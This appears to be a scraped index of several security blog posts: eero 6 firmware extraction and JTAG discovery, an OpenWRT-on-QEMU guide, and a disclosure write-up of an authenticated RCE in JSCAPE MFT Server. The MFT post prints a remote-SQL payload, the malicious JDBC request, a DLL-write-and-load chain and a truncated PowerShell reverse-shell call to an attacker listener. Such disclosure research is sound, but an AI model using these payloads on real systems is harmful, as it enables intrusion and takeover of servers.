ANSI: 6 [ 1882.007017] sd 33:0:0:0: Attached scsi generic sg2 type 0 [ 1882.258668] sd 33:0:0:0: [sdb] 7471104 512-byte logical blocks: (3.83 GB/3.56 GiB) [ 1882.261570] sd 33:0:0:0: [sdb] Write Protect is off [ 1882.261575] sd 33:0:0:0: [sdb] Mode Sense: 87 00 00 00 [ 1882.264699] sd 33:0:0:0: [sdb] Write cache: disabled, read cache: enabled, doesn\u0026#39;t support DPO or FUA [ 1882.284287] sd 33:0:0:0: [sdb] Attached SCSI removable disk A new disk called sdb showed up with a capacity of 4GB. I knew this was a good sign, as the Kingston eMMC chip specification matched up. But also that it didn\u0026rsquo;t automatically disconnect like my previous attempts. I quickly moved onto dumping the actual firmware.\nDumping firmware As soon as the sdb disk was visible I wasted no time in creating a raw dump copy of the firmware. A common utility like dd should do the trick. To dump the contents of a disk to a file you can use the following command:\nsudo dd if=/dev/sdb of=emmc_eer6.bin status=progress bs=16M A screenshot of the actual command being run, which shows a transfer speed of 27MB/s. I also used 7z l emmc_eero6.bin to see if I can identity logicial partitions names.\nExtacting filesystem In total there were 23 logical partitions. To extract the .img files I used the command 7z x emmc_eero6.bin in the current working directory. I then mounted them all, using this simple bash to loop through each img and mount then using mount as root:\nfor i in *.img; do NAME=$(basename \u0026#34;$i\u0026#34; .img) mkdir \u0026#34;$NAME\u0026#34; mount \u0026#34;$i\u0026#34; \u0026#34;$NAME\u0026#34; done Output will show multiple disks when using a graphical interface like Ubuntu.\nAnalysing filesystem I won\u0026rsquo;t go into any great detail in the blog post but I will share some general information about each partition that I found interesting. Also keep in mind, the firmware version I had installed was v7.1.1-16 before the eMMC was desoldered.\nrootfs a compiled python package called nodelib which is used for device management and system operations. This was found in /usr/lib/python3.10/site-packages/nodelib/ folder. Along with other custom binaries.\nrootfs_1 a second root file system which contained the same nodelib package, but this time with a different python version and it wasn\u0026rsquo;t compiled, and was fully readable. This was found in the /usr/lib/python3.8/site-packages/nodelib/ folder.\nlog debugging and other messages, including a firmware download URL that had failed. Firmware archives require a authentication header e.g. https://cloudfront.eeroupdate.com/builds/v7.1.1-16%2B2023-12-13.prod.andytowngateway.tar.gz shows an error.\ncache a few private and public certificate files, which are presumably used to communicate with the backend cloud services, as well as the mobile app.\nbootconfig Qualcomm firmware and other stuff.\nSystemd services A few services which are started during device boot up.\n/lib/udev/rules.d/10-qca.rules /lib/systemd/libsystemd-shared-250.so /lib/systemd/system/core-comms.service /lib/systemd/system/homekit_adk.service /lib/systemd/system/homekit-dnsmasq.service /lib/systemd/system/captive-portal-main-dnsmasq.service /lib/systemd/system/sd-unit-analytics.service /lib/systemd/system/cache-mount.service /lib/systemd/system/pppd.service /lib/systemd/system/asset-manager.service /lib/systemd/system/radvd.service.d/10-eero.conf /lib/systemd/system/ace-messaging.service /lib/systemd/system/smarthomed.service /lib/systemd/system/ebid.service /lib/systemd/system/lldp-poe-mgr.service /lib/systemd/system/ace-zigbee.service /lib/systemd/system/dhclient_v6@.service /lib/systemd/system/aicfd.service /lib/systemd/system/dhclient_v4@.service /lib/systemd/system/btmanagerd.service /lib/systemd/system/smart-cloud-app.service /lib/systemd/system/captive-portal-a-dnsmasq.service /lib/systemd/system/dnsmanager.service /lib/systemd/system/ace-eventmgr.service /lib/systemd/system/thermald.service /lib/systemd/system/thermalmonitor.service /lib/systemd/system/bookshelf.service /lib/systemd/system/cnss_diag.service /lib/systemd/system/ffs-provisioner.service /lib/systemd/system/ec-dnsmasq.service /lib/systemd/system/captive-portal-guest-dnsmasq.service /lib/systemd/system/client-reporter.service /lib/systemd/system/captive-portal-b-dnsmasq.service /lib/systemd/system/noded.service /lib/systemd/system/wpa_supplicant@.service /lib/systemd/system/cache-status.service /lib/systemd/system/pushbutton-monitor.service /lib/systemd/system-shutdown/check_cache_discard /usr/lib A few libraries that are used with other binaries.\n/usr/lib/libAicfIPCPrimitiveUtils.so /usr/lib/acs-lib/libace_ffs_provisioner.so /usr/lib/acs-lib/libace_connectivity_manager.so /usr/lib/acs-lib/libace_map.so /usr/lib/acs-lib/libCHIP.so /usr/lib/acs-lib/libwebsockets.so /usr/lib/acs-lib/libacehal_kv_storage.so /usr/lib/acs-lib/libace_minerva_metrics_api.so /usr/lib/acs-lib/libacehal_device_info.so /usr/lib/acs-lib/libace_tlscfg.so /usr/lib/acs-lib/libace_messaging.so /usr/lib/acs-lib/libwhisperjoin_dss_clientc_sdk.so /usr/lib/acs-lib/libffs_dssclient_sdk.so /usr/lib/libAicfAuthZC.so /usr/lib/libAicfUtils.so /usr/lib/libSmartHomeZigbeeAdapter.so /usr/lib/libSDKComponent.so /usr/lib/libSmartHomeUtils.so /usr/lib/libeero_system.so /usr/lib/libacsdkAssetsMocks.so /usr/lib/libicudata.so.70.1 /usr/lib/libNpbSerializer.so /usr/lib/libacsdkAuthorization.so /usr/lib/libAicfNativeAlexaComm.so /usr/lib/libacsdkDavsClient.so /usr/lib/libDAVSUtils.so /usr/lib/libacsdkAicfCA.so /usr/lib/sqm/eeroos.qos /usr/lib/libCapabilityLibrary.so /usr/lib/libAicfV3Helper.so /usr/lib/libAmazonAccountUtils.so /usr/lib/libPuffinUtils.so /usr/lib/libSmartHomeCHRSSYNC.so /usr/lib/libassetmgrd_client.so /usr/lib/libPuffinCommon.so /usr/bin A few binaries that are not part of the default operating system.\n/usr/bin/ace_messaging_service /usr/bin/AicfD /usr/bin/smarthome_utility_puffin /usr/bin/SmartCloudApp /usr/bin/assetmgrd /usr/bin/ebid /usr/bin/noded /usr/bin/SmartHomed /usr/bin/qorvo-ble-setup-service Conclusion I know readers might say, oh you cheated by going to a phone repair shop to desolder the eMMC chip. While that maybe true, it still didn\u0026rsquo;t stop me from running into issues with actually reading data off the chip.\nIn this blog post I share some of the issues and solutions I ran into while trying to extract data from a eMMC chip. It\u0026rsquo;s a shame I couldn\u0026rsquo;t find an easy way to root the device. And the destructive technique of desoldering chips means that I\u0026rsquo;m left with a completely dead device, well, unless I re-solder the chip back on. But there might be a way in the future.\nWhy no firmware? While this has been fun and an interesting project, I will not be releasing any firmware files. I\u0026rsquo;m a hobbyist and do not wish to be sued by Amazon or Qualcomm for releasing proprietary content.\nWhat\u0026rsquo;s next? The next step is to analyse the firmware in more detail to find any security vulnerabilities, either in their applications or device itself worth reporting and possibly get a bug bounty, as they do have a program on HackerOne.\nResources A list of great resources that I found really useful.\nHardware Hacking 101: Identifying and Dumping eMMC flash Hacking Hardware With a $10 SD Card Reader How to Dead-Bug a BGA Flash Memory chip A detailed description of eMMC technology Flash readers by Voidstarsec ","permalink":"https://markuta.com/eero-6-hacking-part-2/","title":"Hacking Amazon's eero 6 (part 2)"},{"categories":null,"contents":"Overview A short blog on how to install and run the latest version of OpenWRT using QEMU, on a machine with Apple M1. This is similar to my previous blog post on How to build a Debian MIPS image on QEMU.\nThis guide uses the OpenWRT ARMv8 edition, which runs nicely on a Apple M1 chip. It also covers how to install the LuCI web management interface.\nDownload and Install Select and download the necessary files from the link below. I will be using OpenWRT version 23.05.3 based on ARMv8. These can be found on the official website here.\nYou only need the following files:\ngeneric-initramfs-kernel.bin (for recovery mode) openwrt-armsr-armv8-generic-squashfs-combined.img u-boot.bin (found here) Also make sure the qemu software is actually installed. On macOS systems, you could use brew install qemu, this will install various systems (not necessary), for example my machines supports:\nqemu-system-aarch64 qemu-system-hppa qemu-system-microblazeel qemu-system-nios2 qemu-system-riscv64 qemu-system-sparc qemu-system-alpha qemu-system-i386 qemu-system-mips qemu-system-or1k qemu-system-rx qemu-system-sparc64 qemu-system-arm qemu-system-loongarch64 qemu-system-mips64 qemu-system-ppc qemu-system-s390x qemu-system-tricore qemu-system-avr qemu-system-m68k qemu-system-mips64el qemu-system-ppc64 qemu-system-sh4 qemu-system-x86_64 qemu-system-cris qemu-system-microblaze qemu-system-mipsel qemu-system-riscv32 qemu-system-sh4eb qemu-system-xtensa qemu-system-xtensaeb This guide uses qemu-system-aarch64, which supports ARMv8 CPU.\nQMEU Run the following command inside the folder where both u-boot.bin and openwrt-armsr-armv8... are located. This will start the emulator and begin the initial boot process.\nqemu-system-aarch64 -cpu cortex-a72 -m 1024 -M virt,highmem=off -nographic \\ -bios u-boot.bin \\ -drive file=openwrt-armsr-armv8-generic-squashfs-combined.img,format=raw,if=virtio \\ -device virtio-net,netdev=net0 -netdev user,id=net0,net=192.168.1.0/24,hostfwd=tcp:127.0.0.1:1122-:192.168.1.1:22,hostfwd=tcp:127.0.0.1:8080-192.168.1.1:80 \\ -device virtio-net,netdev=net1 -netdev user,id=net1,net=192.168.2.0/24 The options are explained below:\n-cpu cortex-a72 use a specific ARM CPU type -m 1024 use 1GB of RAM -M virt,highmem=off type of machine -nographic no window (use terminal) -bios u-boot.bin use bootloader file -drive file=... use the .img file as disk drive -device virtio-net,netdev=net0 set up a network device set network address range net=192.168.1.0/24 enable host port forwarding with hostfwd=tcp:127.0.0.1:1122-:192.168.1.1:22 e.g. for SSH When you run this command, you should be presented with a shell in your terminal. If you do not see any output, you can try to append -serial stdio to get to standard output.\nHere is an example of what you should see:\nPress [ENTER] to use the shell.\nWeb interface The default installation of OpenWRT does NOT come with a web interface. To get that installed, you can use the working command-line interface to update the package cache, and then install it. I will be using the LuCI package.\nWhile logged-in shell, type:\nopkg update opkg install luci You\u0026rsquo;ll notice a new process called uhttpd is now running on port 80.\nroot@OpenWrt:~# netstat -tupan Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 127.0.0.1:53 0.0.0.0:* LISTEN 2206/dnsmasq tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 1370/dropbear tcp 0 0 192.0.2.15:53 0.0.0.0:* LISTEN 2206/dnsmasq tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 6805/uhttpd This is the web management service.\nNote: To not expose all interfaces, you can set it to forward to localhost only (host machine). For example, using this command hostfwd=tcp:127.0.0.1:1122-:192.168.1.1:22,hostfwd=tcp:127.0.0.1:8080-192.168.1.1:80, which forwards two ports to a specific VM IP address and port. I can then access each service on the forwarded port e.g. ssh root@localhost -p 1122.\nHere\u0026rsquo;s an example of the OpenWRT LuCI web interface from the host system:\nNotice the model linux,dummy-virt, indicating that it\u0026rsquo;s not running on real hardware.\nRecovery mode To enter OpenWRT recovery mode you would have to append -kernel along with the intitramfs file to the qemu command. In this mode, the file system will be mounted as read-only. Here is a complete example:\nqemu-system-aarch64 -cpu cortex-a72 -m 1024 -M virt,highmem=off -nographic \\ -bios u-boot.bin \\ -kernel openwrt-armsr-armv8-generic-initramfs-kernel.bin \\ -drive file=openwrt-armsr-armv8-generic-squashfs-combined.img,format=raw,if=virtio \\ -device virtio-net,netdev=net0 -netdev user,id=net0,net=192.168.1.0/24,hostfwd=tcp:127.0.0.1:1122-:192.168.1.1:22,hostfwd=tcp:127.0.0.1:8080-192.168.1.1:80 \\ -device virtio-net,netdev=net1 -netdev user,id=net1,net=192.168.2.0/24 Bonus A really nice feature of qemu is that you can attach a gdb debugger, and step through a process. This is extremely useful for identifying difficult bugs and exploit development.\nThese options are:\n-S freeze CPU at startup (use \u0026#39;c\u0026#39; to start execution) the guest without waiting for gdb to connect; use -S too -s shorthand for -gdb tcp::1234 For example, a screenshot from another project where I had a x86 vm running on my M1 system, which I attached to using lldb with the option gdb-remote localhost:1234:\n","permalink":"https://markuta.com/openwrt-qemu-m1/","title":"How to install OpenWRT on QEMU"},{"categories":null,"contents":"Update: Fixed proof of concept link. Background This research project started back in July 2023, at around the same time when a critical vulnerability in a popular file-sharing software called MoveIt Transfer was disclosed. More details about that particular vulnerability can be found here and here.\nI was curious and looked for other similar file-sharing software with security issues. And so a few Google searches later, I found a candidate, a software for enterprises called MFT Server by JSCAPE. I downloaded a trial version and began initial testing.\nWhat is it? JSCAPE MFT Server is a paid for enterprise file-sharing solution that supports most major platforms. It can handle multiple communication protocols such as (AS2, FTP/S, SFTP, HTTP/S, WebDAV, Cloud) and more.\nA screenshot of a few customers listed on their website.\nA free 7-day demo is available at this link (requires an email for a license).\nInstalling Server I opted to install the 64-bit Windows version on my virtual machine. I won\u0026rsquo;t bore you with the installation process but the installer comes with a standalone Java environment which means we don\u0026rsquo;t have to install any additional dependencies, which is nice.\nI would like to point out the \u0026ldquo;Server Access Settings\u0026rdquo; step which lets users configure a management IP address on default port 10880 and the REST API on port 11880, as well as the admin user credentials. This was set to default.\nFor evaluation copies, the default option for the Database settings is set to a embedded database type. But there\u0026rsquo;s also a database URL parameter where you could choose other databases via the jdbc, which is greyed out. This can be seen in the following screenshot:\nAfter supplying the temporary license file, the set up process should be done. A new Windows Service will be created called MFT Server which is configured to automatically start after a system reboot.\nWeb Management When the installation process is finished. A web management interface is accessible from either 127.0.0.1 or a local IP address e.g. 192.168.153.129 (external IP set in the installation process), on port 11880. You have to specify the admin credentials.\nDatastore feature Whilst browsing through the management interface and looking for interesting features, I stumbled across the Datastore feature, which can be found in Settings \u0026gt; Datastore. As the name implies, it\u0026rsquo;s meant for the database management. The screenshot below shows we are able to configure the fields JDBC URL, Username, Password, Pool, Pool Timeout, and Synchronize data every.\nWhen you press the Test Parameters button a window appears saying the database test has passed, with a few tick marks and nothing else. To know more about this HTTP request, I set up a BurpSuite proxy to capture and review this request more closely.\nThe HTTP POST request is sent to the path /2/rest/management/datastore/test along with a JSON body with the chosen parameters and values. The url field supplies the actual JDBC URL that we\u0026rsquo;re interested in.\nTo understand what the jdbc:h2 part meant, I did a bit of research.\nH2 Database H2 Database is fast open-source database engine interface used in Java applications. There have been at least two critical vulnerabilities in versions 1.4.199 and 2.1.210 which enables attackers to execute commands using an external SQL input.\nReviewing the files and folders of MFT Server software, I was able to confirm the presence of this library, which turned out to also a vulnerable version. This is when I got really excited.\nThe vulnerable library was located in (Windows):\nThe library at C:\\Program Files\\MFT Server\\libs\\h2\\h2-1.4.199.jar was bundled in versions mft-server-install-x64-2023.2.2.503 and earlier. You can read about the H2 vulnerability here, with a proof of concept available here.\nExploiting the vulnerability As a quick smoke test, I set up a simple python web server python3 -m http.server that served a test.sql file. This file contains a payload that should execute a command on the system using Runtime.getRuntime().exec(cmd) to open the Windows calculator.\nThe contents of test.sql was:\nCREATE ALIAS EXEC AS \u0026#39;String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd);return \u0026#34;su18\u0026#34;;}\u0026#39;; CALL EXEC (\u0026#39;/? \u0026amp;\u0026amp; calc\u0026#39;); I then sent the following HTTP POST request, with a custom url value:\nPOST /2/rest/management/datastore/test HTTP/1.1 Host: 192.168.159.130:11880 Content-Type: application/json Cookie: JSESSIONID_11880=node01cu13vvfy01hqqy0kd7y49d3k17.node0; Connection: close { \u0026#34;url\u0026#34;:\u0026#34;jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM \u0026#39;http://192.168.159.135:8000/test.sql\u0026#39;\u0026#34;, \u0026#34;username\u0026#34;:\u0026#34;server\u0026#34;, \u0026#34;password\u0026#34;:null, \u0026#34;connectionPoolSize\u0026#34;:100, \u0026#34;idleConnectionTtlMillis\u0026#34;:10000 \u0026#34;synchronizationPeriodMillis\u0026#34;:null } The python HTTP server request logs:\nYES! although the command doesn\u0026rsquo;t execute calc.exe on the target system, we can confirm the server sends a request back to the attacker and tries to parse the SQL query.\nThe error CreateProcess error=2, The system cannot find the file specified indicates the reason might be related javac, and the fact I don\u0026rsquo;t have Java installed on my Windows system, since I\u0026rsquo;m using the standalone Java environment provided by the JSCAPE MFT Server software.\nI then tried to find other ways at exploiting this vulnerability.\nGetting RCE I read an excellent blog post by Markus Wulftange. He demonstrated how to exploit a vulnerable H2 database by using Java Native Interfaces (JNIs) to achieve remote command execution. You should definitely have a read, as this blog post is largely based on his work.\nAt a high-level, the attack has three stages: run a SQL query to write a valid DLL library file to the system. Use another SQL query to load the DLL library into the target MFT Server process, and finally use the Java Native Interface (JNI) with the loaded library to execute commands on the system.\nWriting to file system To start off, we need to be able to write to the system to load a DLL library. From the blog post above, a function called CSVWRITE() was used to write to the file system. Here is the example:\nSELECT CSVWRITE(\u0026#39;C:\\Windows\\Temp\\JNIScriptEngine.dll\u0026#39;, CONCAT(\u0026#39;SELECT NULL \u0026#34;\u0026#39;, CHAR(0x4d),CHAR(0x5a),...,\u0026#39;\u0026#34;\u0026#39;), \u0026#39;ISO-8859-1\u0026#39;, \u0026#39;\u0026#39;, \u0026#39;\u0026#39;, \u0026#39;\u0026#39;, \u0026#39;\u0026#39;, \u0026#39;\u0026#39;); However, during my initial testing I could not get this function to write to the system properly, I would always get an error.\nI then went on the official H2 website to try find an alternative function to CVEWRITE(). I identified a function called FILE_WRITE(), which as the name suggests, writes to a file. Markus\u0026rsquo;s blog also mentions this function but for some reason I skipped over it.\nThe website provides FILE_WRITE() usage:\nFILE_WRITE ( blobValue , fileNameString ) Write the supplied parameter into a file. Return the number of bytes written. Write access to folder, and admin rights are required to execute this command. Example: SELECT FILE_WRITE(\u0026#39;Hello world\u0026#39;, \u0026#39;/tmp/hello.txt\u0026#39;)) LEN; This could be a perfect alternative.\nThe usage example has a simple plaintext value that write to a text file, but we want to write to a DLL file instead, which would take all sorts of weird characters. I initially tested using CONCAT('SELECT NULL \u0026quot;', CHAR(0x4d),CHAR(0x5a),...,'\u0026quot;') but that failed.\nI was stuck for a bit but after some more Googling I found out you can use a X before the quotes to indicate a Hexadecimal input value. Here is a example:\n-- Write file to system CALL FILE_WRITE(X\u0026#39;4d5a900003...\u0026#39;,\u0026#39;C:\\\\Program Files\\\\MFT Server\\\\JNIScriptEngine.dll\u0026#39;); With this I was able to convert a DLL into Hex and write to the file system, perfect!\nAlso notice the file permissions, only administrators and system users can modify it. This is because MFT Server is running as the SYSTEM user and thus inherits the same permissions.\nLoading native library The next step is to load the library we just created. This can be done with the following two commands: 1) create a reference to a static public method java.lang.System.load and 2) load the DLL file with System_load() function. Here is an example:\n-- Loading library CREATE ALIAS IF NOT EXISTS System_load FOR \u0026#34;java.lang.System.load\u0026#34;; CALL System_load(\u0026#39;C:\\\\Program Files\\\\MFT Server\\\\JNIScriptEngine.dll\u0026#39;); To confirm the library is loaded, we can inspect the server.exe process memory using ProcessHacker. As shown below, a handle to JNIScriptEngine can be found at 0x7ff9bcf20000 (different on each reboot).\nRunning commands Finally, we create an alias for the JNIScriptEngine_eval to evaluate and then execute a command on the system. For example, the following shows how you would execute an encoded powershell command (full command not included) to get a remote shell:\n-- Evaluate script CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR \u0026#34;JNIScriptEngine.eval\u0026#34;; -- Run command e.g. PowerShell reverse shell on 192.168.159.135:4444 base64 encoded UTF-16LE CALL JNIScriptEngine_eval(\u0026#39;new java.util.Scanner(java.lang.Runtime.getRuntime().exec(\u0026#34;powershell.exe -enc JABjAGwAaQBl...dAAgAD0AZQAoACkA\u0026#34;).getInputStream()).useDelimiter(\u0026#34;\\\\Z\u0026#34;).next()\u0026#39;); This took a few tries but I finally was able to get a SYSTEM shell on our Kali listener:\nThis was done in several HTTP requests, otherwise the SQL query might overwrite the already written DLL. I opted to comment each step after sending a HTTP request. You could also use separate SQL files too.\nDisclosure by Rapid7 On September 2023, Rapid7 identified a separate vulnerability in JSCAPE MFT Server, which is tracked as CVE-2023-4528. This vulnerability is also related to an insecure Java deserialisation bug but within an XML parser, instead of the H2 library. It too allows authenticated attackers to gain remote code execution.\nThe fix applied by the JSCAPE developers introduced a few changes which made my initial exploit harder to achieve RCE. For example, I was no longer able to run:\n-- Evaluate script CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR \u0026#34;JNIScriptEngine.eval\u0026#34;; CALL JNIScriptEngine_eval(\u0026#39;new java.util.Scanner(java.lang.Runtime.getRuntime().exec(\u0026#34;calc\u0026#34;).getInputStream()).useDelimiter(\u0026#34;\\\\Z\u0026#34;).next()\u0026#39;); I would get a new error:\nThe error with code 90105 is thrown when an exception occurred in a user-defined method. Nevertheless, it still may be possible to execute arbitrary code because we are able to write to any location as the SYSTEM user, which is very powerful. An attacker could replace a certain DLL library with a malicious one and wait for the system to be rebooted to execute.\nProof of Concept Note: You have to separate each stage of the proof of concept into a unique HTTP request. To avoid overwriting or loading DLLs into processes.\nThe proof of concept poc.sql has three parts:\nWrite DLL to the system. Load DLL into MFT Server server.exe process memory. Call JNI function and execute commands on the system. MFT Server version 2023.3.1.513 was tested on Windows 10 x64 and confirmed to be vulnerable. But over versions may also be affected too.\nIndicators of Compromise (IoC) The MFT Server log file C:\\Program Files\\MFT Server\\var\\log\\server_out.log contains a bunch of events relating to jdbc connections, and suspicious SQL commands. For example, the following shows the SQL commands CALL FILE_WRITE() and CALL System_load() that attempt to write to the file system and then load them into memory.\n2023-10-15 14:10:05 database: connecting session #3 to mem:testdb 2023-10-15 14:10:05 jdbc[3]: /*SQL */SET TRACE_LEVEL_SYSTEM_OUT 3; 2023-10-15 14:10:05 jdbc[3]: /*SQL #:1*/CALL FILE_WRITE(X\u0026#39;4d5a9000...000000\u0026#39;,\u0026#39;C:\\\\\\\\Program Files\\\\\\\\MFT Server\\\\\\\\JNIScriptEngine.dll\u0026#39;); ... 2023-10-15 14:10:05 jdbc[3]: /*SQL #:1 t:24*/CALL System_load(\u0026#39;C:\\\\\\\\Program Files\\\\\\\\MFT Server\\\\\\\\JNIScriptEngine.dll\u0026#39;); 2023-10-15 14:10:05 jdbc[3]: /*SQL */; 2023-10-15 14:10:05 jdbc[3]: /*SQL #:4 t:46*/RUNSCRIPT FROM \u0026#39;http://192.168.153.136/poc.sql\u0026#39;; ... Applying for a CVE I tried to apply for a CVE, but after waiting 2 months I received a response from mitre.org indicating that the CVE will not be registered due to the bug being with an out-of-date library that the software uses, which already has a CVE registered. I was a bit disappointed but it does make sense.\nFrom: cve-request@mitre.org Please use CVE-2022-23221 or CVE-2021-42392 to refer to this JSCAPE MFT Server vulnerability. We cannot provide separate CVE IDs for every product that ships with an outdated, vulnerable copy of H2 Database. ... Resources Exploiting H2 Database with native libraries and JNI Chaining Vulnerabilities in H2 Database for RCE Timeline Note: The long gap between June and October was mostly me trying to find auth bypass type bugs, since this vulnerability required administrator credentials to be exploitable. But also other things getting in the way like life and work.\n22/06/2023: Discovered JDBC vulnerability via H2 library 27/06/2023: Testing for other auth bypass vulnerabilities 15/10/2023: Submitted a request to register a CVE on MITRE 21/10/2023: Retested new version release 10/12/2023: Response from MITRE of CVE not being registered 01/01/2024: Contact Rapid7 to help with disclosure 02/02/2024: First contact attempt with vendor (Redwood) 07/02/2024: Second contact attempt with vendor 28/02/2024: Third contact attempt with vendor 29/02/2024: Response from vendor (team working on this issue) 14/03/2024: Contact vendor asking for fix confirmation (no response) 22/03/2024: Published this blog ","permalink":"https://markuta.com/jscape-mft-server-rce/","title":"Exploiting a JDBC deserialization vulnerability in MFT Server by JSCAPE"},{"categories":null,"contents":"This is the first in the series of hacking Amazon\u0026rsquo;s eero 6 (3rd generation) Wi-Fi device. In this post I will be focusing on device disassembly, identifying pins, brute forcing JTAG, and reading serial output.\nThe second part of the blog can be found: https://markuta.com/eero-6-hacking-part-2/\nAbout Eero is a San Francisco-based wireless Internet company founded in 2015. It is known for making household consumer Wi-Fi products. The company was acquired by Amazon in 2019 for $97 million.\nDevice Specification eero 6 (3rd gen 2020) device specification. The table below is based on data from evanmccann.net, which includes a nice table that compares other eero devices.\nType Value CPU speed 1.2GHz x 4 CPU type Cortex-A53 (Qualcomm IPQ6000) RAM 512MB Storage 4GB Flash (Kingston EMMC04G-M627) Generation Gen 3 Release 2020 WiFi class AX1800 (WiFi 6) Type Extender/Gateway Radios 2 (2.4GHz and 5GHz) BlueTooth 5.0 ZigBee Yes Power 15W (via USB type-C) FCC documents Before purchasing a device on eBay, I first did a bit of research to find out whether there were any internal device photos available. I was mainly interested in anything resembling debug interfaces and chip part numbers. As it turns out, the Federal Communications Commission (FCC) published several documents of different eero products. These products were typically engineering samples but proved to be extremely useful.\nThe documents (mirror available here) don\u0026rsquo;t have high resolution photos, which makes reading most chip markings difficult, but they did have a few photos of interesting pins. Here\u0026rsquo;s a photo that immediately peaked my interest.\nThe 5 by 2 pins look a lot like a 10-pin ARM JTAG interface.\nI also noticed 3 pins on the top side of the PCB, which looked like a serial interface.\nDisassembly The device itself was surprisingly easy to disassemble. To start off with you need to remove the manufacturer sticker located on the bottom of the device. This reveals a single T4? screw as shown in the photo below.\nYou then need to pry open the two plastic pieces, I used a thin piece of plastic (expired gift card) as to not damage internal components or the case itself. You will then see three T4 screws attached to the thick aluminum base.\nFlip the device over and remove four more screws.\nYou will notice there are two main boards which are connected by a 34-pin GPIO interface. A board with two ethernet ports for networking and a single USB type-C port for power (15W). And the other board with the SoC, NAND, and other RF components.\nThe following shows the underneath side of the board (one with the RF components).\nAnd here\u0026rsquo;s a view from the top with one of the RF shields removed, revealing the CPU, RAM and NAND chips:\nIdentifying pins I quickly checked whether the same pins from the FCC photos were also present on my device, which they were. The only difference (it would seem) was that my PCB was blue, while the other one was green. It\u0026rsquo;s likely the FCC device was an engineering version.\nSoldering wires\nI soldered each pin onto a mini solder-able breadboard using a 0.2mm copper wire that had a thin layer of enamel. This made it much easier to work with as I could then attach it to a full size breadboard and then use standard jumper wires.\nBefore doing this I quickly checked for ground pins by putting my multimeter in continuity mode. I set my black probe on something I knew was ground like an RF shield, and the red probe on each pin.\nA loud beep confirmed pin 3 was ground.\nHere\u0026rsquo;s a photo of all the wires soldered onto a mini breadboard attached to my standard breadboard: And here\u0026rsquo;s what it looked like with the two PCBs connected together, and wires protruding from underneath. I would later solder those 3 pins on the top (not seen in this photo):\nPin voltage After soldering the wires to the breadboard I turned the device on and let to run for a few seconds. Here was the voltage I recorded for each pin:\nPin Volts 1 - 1.8v 2 - 1.8v 3 - G 4 - 1.8v 5 - 0.5v 6 - 0.7v 7 - 0.4 8 - 1.8v 9 - 1.8v 10 - 1.8v Setting up Wiring The wiring and pin numbers may get confusing, especially with multiple coloured pins, devices, and different orientations. I found it very useful to map out each pin in a small table and use it as a reference.\ndevice | level shifter | Arduino | program -------+---------------+----------+-------- 1 -----| VA = VB |---- 3.3v | 2 -----| A1 = B1 |---- D2 | 1 3 ---- G | | 4 -----| A2 = B2 |---- D3 | 2 5 -----| A3 = B3 |---- D4 | 3 6 -----| A4 = B4 |---- D5 | 4 7 -----| A5 = B5 |---- D6 | 5 8 -----| A6 = B6 |---- D7 | 6 9 -----| A7 = B7 |---- D8 | 7 10 ----| A8 = B8 |---- D9 | 8 Taking photos of the all the wires connected wasn\u0026rsquo;t very helpful, so I decided to create this diagram on how all of the components were connected:\nNote: Also notice a little dot on the left side of pin 1 (1.8v line) on the eero device which indicates the first pin.\nLogic level shifter\nThese 10-pins on the eero device operate under 1.8v, whereas the Arduino operates under 3.3v or 5v. I therefore needed to use a logic level shifter. A logic level shifter is a circuit board thats lets two devices that operate on a different voltage communicate with each other. A short video explanation here. I used an 8-channel shifter called TXS0108E.\nArdunio Nano\nI also used a cheap little Arduino Nano RP2040 to act as my JTAG and SWD brute force tool. It was reprogrammed with two different platformio projects created by szymonh, one for JTAG called JTAGscan and the other for SWD called SWDscan.\nAlternatively, you could use go-jtagenum, which works on Raspberry Pi models.\nBrute force The JTAGscan tool supports three different attack types (BYPASS, IDCODE, and BYPASS with just TDI). I made sure pins 2-8 were selected using the mask argument m with the value 0x1fc or 508 in decimal. Not seen in the output below, but I used the e enumerate option, and a to run all checks.\nJTAG requires at least four (TCLK, TMS, TDI, and TDO) pins to operate, and for SWD it\u0026rsquo;s just two (SWCLK and SWDIO).\nNote: The pin numbers in this section may be different from the previous sections.\n\u0026gt; m Enter pin mask 0x1fc Pin mask set to 111111100 ... +-------------------------------+ | 4 | 2 | 6 | 8 | 32 | +----------- SUCCESS -----------+ | TCK | TMS | TDO | TDI | Width | +------ BYPASS complete --------+ ... +-------------------------------+ | 4 | 2 | 6 | dba00477 | +----------- SUCCESS -----------+ | TCK | TMS | TDO | IDCODE | +------ IDCODE complete --------+ TCK, TMS, and TDO found. ... +-- BYPASS searching, just TDI -+ | TCK | TMS | TDO | TDI | Width | +-------------------------------+ | 4 | 2 | 6 | 8 | 32 | +----------- SUCCESS -----------+ JTAG pins found! and the chip IDCODE of dba00477.\nTCK is pin 4 TMS is pin 2 TDO is pin 6 TDI is pin 8 SWDscan\nAlthough not required, since we\u0026rsquo;ve already identified the JTAG interface which can be translated to TCLK = SWCLK and TMS = SWDIO. We can do it for the sake of completion.\nSimilar to the previous tool, here is the output:\n\u0026gt; m Enter pin mask 0x1fc Pin mask set to 111111100 \u0026gt; e +-------------------------------------------+ | CLK PIN | IO PIN | ACK | PART NO | MAN ID | +-------------------------------------------+ | 2 | 3 | 7 | ffff | 7ff | | 2 | 4 | 7 | ffff | 7ff | | 2 | 5 | 7 | ffff | 7ff | | 2 | 6 | 7 | ffff | 7ff | | 2 | 7 | 7 | ffff | 7ff | | 2 | 8 | 7 | ffff | 7ff | | 3 | 2 | 7 | ffff | 7ff | | 3 | 4 | 7 | ffff | 7ff | | 3 | 5 | 7 | ffff | 7ff | | 3 | 6 | 7 | ffff | 7ff | | 3 | 7 | 7 | ffff | 7ff | | 3 | 8 | 7 | ffff | 7ff | | 4 | 2 | 1 | ba02 | 23b | +----------------- SUCCESS -----------------+ Notice the manufacturer ID changes.\nSWCLK is pin 4 SWDIO is pin 2 Discoverd JTAG/SWD pinout Debug interface Now that we know the pins for both JTAG and SWD we need to use a debug adapter such as a Adafruit FT232H adapter (supports l2c, SPI, JTAG, UART etc.) to communicate with the eero device. The device is based on the widely supported FTDI chip, and works well under Linux tools.\nOpenOCD To communicate with discovered JTAG interface, I used the open-source utility 